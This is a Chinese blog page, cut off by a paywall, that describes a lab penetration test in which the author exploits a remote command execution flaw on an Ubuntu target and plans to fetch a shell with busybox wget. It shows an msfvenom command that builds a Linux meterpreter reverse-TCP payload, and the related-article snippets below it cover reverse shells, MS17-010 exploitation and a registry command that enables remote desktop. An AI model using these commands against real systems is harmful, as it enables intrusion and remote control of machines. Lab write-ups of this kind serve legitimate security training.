模拟渗透测试——使用metasploit与wget获取靶机shell

最新推荐文章于 2024-02-12 20:01:42 发布
最新推荐文章于 2024-02-12 20:01:42 发布
阅读量1.5k 收藏 6
点赞数
分类专栏: web安全 文章标签: 安全 shell python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mirocky/article/details/112829755
版权

前言

近日在复现漏洞时,由于目标所提供的服务中的某段代码没有对权限进行检查,导致了远程命令执行——RCE漏洞。

由于该漏洞本身的特性,所能执行的命令是需要通过url进行拼接且每次只可执行一句,因此尝试获取靶机shell来做到更多的事。

但在尝试的过程中发现目标对于防渗透措施做的相当不错,删除或者禁用了很多命令,上篇文章(《反弹shell常用命令》)所提到的所有方式都没有尝试成功。但天无绝人之路,busybox中wget的身影吸引了我的注意。

环境准备

靶机:ubuntu 192.168.116.128
攻击机:kali 192.168.116.129

测试流程

1 攻击机使用msf生成二进制木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=开放端口 -f elf > p.elf

最低0.47元/天 解锁文章
连人
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 渗透测试
小能猫的博客
01-18 4134
┌──(root????kali)-[/home/kali/Desktop] └─# service postgresql start ┌──(root????kali)-[/home/kali/Desktop] └─# msfdb init [i] Database already started [+] Creating database user 'msf'...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
SQLmap使用指南(包含使用SQLmap获取shell)
北冥同学的成长记录笔记
07-16 4454
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
【红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1509
【红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
metasploitable2靶场渗透
weixin_45349299的博客
02-13 402
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
Veil生成免杀payload 渗透win10 获取靶机shell
qq_50854662的博客
03-31 647
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134  靶机:win10 192.168.115.1 二:Veil下载、安装、使用 kali里默认没有安装Veil,我们通过命令行安装: apt-get update && apt-get install veil 安装过程有点漫长,如果用的国内源可能会快点。 安装完成后启动V...
DC-1 靶机渗透测试(拿shell,提权)
single_g_l的博客
03-17 5134
目录 一. 环境 二. 信息收集 1. 主机发现 2.访问 192.168.1.184:80 三. 利用msfconsole 攻击(拿到flag1) 1. 漏洞利用成功 2. 进入会话 ,拿到flag1.txt ---shell ​四. 找到配置文件,获取flag2 五. 修改管理员密码,登录网站,拿到flag3 1. 获取交互式shell, 执行MySQL语句 2. 查看管理员用户 3. 修改管理员密码 六. 用find语句,找到flag4 七. SUID提权,获取...
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit使用 LNK 漏洞进行渗透测试 ...总结:使用 Metasploit 中的 LNK 漏洞进行渗透测试可以获得目标机的 shell 权限,但需要注意目标机的安全防护设置,例如补丁和杀毒软件的存在可能会影响测试的成功率。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
关于Metasploit Framework与渗透测试相关知识
12-28
**Metasploit Framework详解与渗透测试实践** 渗透测试是一种安全评估方法,通过模拟黑客攻击来检测系统的脆弱性。在这个过程中,Metasploit Framework扮演着核心工具的角色,它为安全专家提供了大量的漏洞利用代码...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
【打靶记录】VulnHub-stapler靶机渗透wp
最新发布
qq_39972370的博客
02-12 1145
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
msf获取靶机shell进行远控
xiao_he0123的博客
01-25 4106
思路:msf制作exe木马文件靶机通过点击开启后门 原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息,本机打开监听状态,收到信息后进行操作 前提:知道主机IP(命令行输入ifconfig) (1)msf制作木马 输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马 命令行中参数意义: 然后开启apache服务: (2)靶机下载运行木马本机进行监听 靶机在浏览器中输入192.168.40...
永恒之蓝漏洞利用(MS17-010)获取shell获取靶机屏幕截图
沙罗沙罗的博客
05-09 4153
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝”漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 2288
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
Kali Linux 学习日记5 - MS17_010
qq_46081990的博客
03-06 565
若其未开放,可以用命令让其开放:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f。由于防火墙的原因,payload一般喜欢用反向tcp,原理是让靶机往外主动连攻击机:set payload windows/x64/meterpreter/reverse_tcp。搜索ms17_010漏洞:search ms17_010。
实验⼀:Windows主机漏洞利⽤攻击实践
yyj1781572的博客
01-07 1085
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
靶场渗透(一)
明哥哥知识分享
09-21 1686
测试环境 靶机:billu_b0x 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22,80 渗透测试 • 根据上面信息搜集得到的80端口开放可以直接访问网站 • 根据提升尝试进行sql注入攻击 测试语句:1’ or 1=1 # 1’ an
一次简单的靶场getshell
u013622866的博客
05-08 891
前言 师傅搭建了一个简单的靶场,要求getshell,对于我一个小白来说,难免有点难度……那就慢慢来吧…… 信息收集 虽然是个简单的靶场,不涉及IP|端口一类的收集,但是还是要对网站进行一个大概的浏览.... 判断其环境 中间件:nginx php 查找同款cms 前端js 前端css cms关键字 调用的路径 首页logo可能存在指向官网cms的超链接 后台前端内...
使用MSF进行渗透测试:Web传递获取靶机权限教程
"E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限" 在网络安全领域,渗透测试是一种授权的攻击方法,用于检测系统和网络的安全漏洞。该课程主要讲解如何利用Metasploit Framework (MSF)进行渗透测试,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值